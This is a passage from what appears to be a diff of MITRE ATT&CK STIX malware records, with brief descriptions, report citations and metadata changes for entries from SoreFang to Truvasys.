APT29 July 2020)(Citation: CISA SoreFang July 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0516", + "external_id": "S0516" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + }, + { + "source_name": "CISA SoreFang July 2016", + "description": "CISA. (2020, July 16). MAR-10296782-1.v1 \u2013 SOREFANG. Retrieved September 29, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SoreFang" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:55.728000+00:00\", \"old_value\": \"2025-04-16 20:38:40.031000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--03ea629c-517a-41e3-94f8-c7e5368cf8f4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-15 01:30:05.198000+00:00", + "modified": "2025-04-25 14:42:31.753000+00:00", + "name": "Spark", + "description": "\n[Spark](https://attack.mitre.org/software/S0543) is a Windows backdoor and has been in use since as early as 2017.(Citation: Unit42 Molerat Mar 2020) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0543", + "external_id": "S0543" + }, + { + "source_name": "Spark", + "description": "\n(Citation: Unit42 Molerat Mar 2020) " + }, + { + "source_name": "Unit42 Molerat Mar 2020", + "description": "Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.", + "url": "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Spark" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:31.753000+00:00\", \"old_value\": \"2025-04-16 20:37:52.059000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--599cd7b5-37b5-4cdd-8174-2811531ce9d0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-21 14:55:00.996000+00:00", + "modified": "2025-04-25 14:43:27.242000+00:00", + "name": "SpicyOmelette", + "description": "[SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0646", + "external_id": "S0646" + }, + { + "source_name": "Secureworks GOLD KINGSWOOD September 2018", + "description": "CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.", + "url": "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SpicyOmelette" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:27.242000+00:00\", \"old_value\": \"2025-04-16 20:38:10.394000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:39.606000+00:00", + "modified": "2025-04-25 14:42:57.989000+00:00", + "name": "SslMM", + "description": "[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0058", + "external_id": "S0058" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SslMM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:57.989000+00:00\", \"old_value\": \"2025-04-16 20:38:01.128000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--96566860-9f11-4b6f-964d-1c924e4f24a4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:07.496000+00:00", + "name": "Starloader", + "description": "[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0188", + "external_id": "S0188" + }, + { + "source_name": "Starloader", + "description": "(Citation: Symantec Sowbug Nov 2017)" + }, + { + "source_name": "Symantec Sowbug Nov 2017", + "description": "Symantec Security Response. (2017, November 7). Sowbug: Cyber espionage group targets South American and Southeast Asian governments. Retrieved November 16, 2017.", + "url": "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Starloader" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Alan Neville, @abnev" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:07.496000+00:00\", \"old_value\": \"2025-04-16 20:38:24.530000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--91000a8a-58cc-4aba-9ad0-993ad6302b86", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:21.437000+00:00", + "modified": "2025-04-25 14:44:02.994000+00:00", + "name": "StreamEx", + "description": "[StreamEx](https://attack.mitre.org/software/S0142) is a malware family that has been used by [Deep Panda](https://attack.mitre.org/groups/G0009) since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. (Citation: Cylance Shell Crew Feb 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0142", + "external_id": "S0142" + }, + { + "source_name": "StreamEx", + "description": "(Citation: Cylance Shell Crew Feb 2017)" + }, + { + "source_name": "Cylance Shell Crew Feb 2017", + "description": "Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV\u2019s Radar. Retrieved February 15, 2017.", + "url": "https://www.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "StreamEx" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:02.994000+00:00\", \"old_value\": \"2025-04-16 20:38:22.967000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:17.568000+00:00", + "modified": "2025-04-25 14:43:39.731000+00:00", + "name": "Sykipot", + "description": "[Sykipot](https://attack.mitre.org/software/S0018) is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of [Sykipot](https://attack.mitre.org/software/S0018) hijacks smart cards on victims. (Citation: Alienvault Sykipot DOD Smart Cards) The group using this malware has also been referred to as Sykipot. (Citation: Blasco 2013)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0018", + "external_id": "S0018" + }, + { + "source_name": "Alienvault Sykipot DOD Smart Cards", + "description": "Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.", + "url": "https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards" + }, + { + "source_name": "Blasco 2013", + "description": "Blasco, J. (2013, March 21). New Sykipot developments [Blog]. Retrieved November 12, 2014.", + "url": "http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Sykipot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:39.731000+00:00\", \"old_value\": \"2025-04-16 20:38:14.881000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--04227b24-7817-4de1-9050-b7b1b57f5866", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:42:32.305000+00:00", + "name": "SynAck", + "description": "[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0242", + "external_id": "S0242" + }, + { + "source_name": "SynAck", + "description": "(Citation: SecureList SynAck Doppelg\u00e4nging May 2018) (Citation: Kaspersky Lab SynAck May 2018)" + }, + { + "source_name": "SecureList SynAck Doppelg\u00e4nging May 2018", + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.", + "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + }, + { + "source_name": "Kaspersky Lab SynAck May 2018", + "description": "Bettencourt, J. (2018, May 7). Kaspersky Lab finds new variant of SynAck ransomware using sophisticated Doppelg\u00e4nging technique. Retrieved May 24, 2018.", + "url": "https://usa.kaspersky.com/about/press-releases/2018_synack-doppelganging" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "SynAck" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:32.305000+00:00\", \"old_value\": \"2025-04-16 20:37:52.360000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--7f8730af-f683-423f-9ee1-5f6875a80481", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:40.391000+00:00", + "modified": "2025-04-25 14:43:52.533000+00:00", + "name": "Sys10", + "description": "[Sys10](https://attack.mitre.org/software/S0060) is a backdoor that was used throughout 2013 by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0060", + "external_id": "S0060" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Sys10" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:52.533000+00:00\", \"old_value\": \"2025-04-16 20:38:20.019000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--876f6a77-fbc5-4e13-ab1a-5611986730a3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:01.951000+00:00", + "modified": "2025-04-25 14:43:55.595000+00:00", + "name": "T9000", + "description": "[T9000](https://attack.mitre.org/software/S0098) is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. (Citation: FireEye admin@338 March 2014) (Citation: Palo Alto T9000 Feb 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0098", + "external_id": "S0098" + }, + { + "source_name": "FireEye admin@338 March 2014", + "description": "Moran, N. and Lanstein, A.. (2014, March 25). Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370. Retrieved April 15, 2016.", + "url": "https://www.fireeye.com/blog/threat-research/2014/03/spear-phishing-the-news-cycle-apt-actors-leverage-interest-in-the-disappearance-of-malaysian-flight-mh-370.html" + }, + { + "source_name": "Palo Alto T9000 Feb 2016", + "description": "Grunzweig, J. and Miller-Osborn, J.. (2016, February 4). T9000: Advanced Modular Backdoor Uses Complex Anti-Analysis Techniques. Retrieved April 15, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/t9000-advanced-modular-backdoor-uses-complex-anti-analysis-techniques/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "T9000" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:55.595000+00:00\", \"old_value\": \"2025-04-16 20:38:20.867000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--7f4bbe05-1674-4087-8a16-8f1ad61b6152", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-05 15:56:44.479000+00:00", + "modified": "2025-04-25 14:43:52.174000+00:00", + "name": "TAINTEDSCRIBE", + "description": "[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0586", + "external_id": "S0586" + }, + { + "source_name": "CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020", + "description": "USG. (2020, May 12). MAR-10288834-2.v1 \u2013 North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TAINTEDSCRIBE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:52.174000+00:00\", \"old_value\": \"2025-04-16 20:38:19.869000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:39.777000+00:00", + "name": "TDTESS", + "description": "[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit .NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0164", + "external_id": "S0164" + }, + { + "source_name": "TDTESS", + "description": "(Citation: ClearSky Wilted Tulip July 2017)" + }, + { + "source_name": "ClearSky Wilted Tulip July 2017", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TDTESS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:39.777000+00:00\", \"old_value\": \"2025-04-16 20:37:55.276000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:50.321000+00:00", + "name": "TURNEDUP", + "description": "[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0199", + "external_id": "S0199" + }, + { + "source_name": "TURNEDUP", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TURNEDUP" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Christiaan Beek, @ChristiaanBeek", + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:50.321000+00:00\", \"old_value\": \"2025-04-16 20:38:38.086000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-08 14:57:32.842000+00:00", + "modified": "2025-04-25 14:44:28.616000+00:00", + "name": "TajMahal", + "description": "[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0467", + "external_id": "S0467" + }, + { + "source_name": "Kaspersky TajMahal April 2019", + "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019.", + "url": "https://securelist.com/project-tajmahal/90240/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TajMahal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:28.616000+00:00\", \"old_value\": \"2025-04-16 20:38:31.332000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c5e9cb46-aced-466c-85ea-7db5572ad9ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:11.148000+00:00", + "modified": "2025-04-25 14:44:38.888000+00:00", + "name": "Trojan.Mebromi", + "description": "[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before MBR. (Citation: Ge 2011)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0001", + "external_id": "S0001" + }, + { + "source_name": "Ge 2011", + "description": "Ge, L. (2011, September 9). BIOS Threat is Showing up Again!. Retrieved November 14, 2014.", + "url": "http://www.symantec.com/connect/blogs/bios-threat-showing-again" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Trojan.Mebromi" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:38.888000+00:00\", \"old_value\": \"2025-04-16 20:38:34.746000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--691c60e2-273d-4d56-9ce6-b67e0f8719ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:43:39.011000+00:00", + "name": "Truvasys", + "description": "[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0178", + "external_id": "S0178" + }, + { + "source_name": "Truvasys", + "description": "(Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)" + }, + { + "source_name": "Microsoft Win Defender Truvasys Sep 2017", + "description": "Microsoft. (2017, September 15). Backdoor:Win32/Truvasys.A!dha. Retrieved November 30, 2017.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha" + }, + { + "source_name": "Microsoft NEODYMIUM Dec 2016", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Truvasys" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": 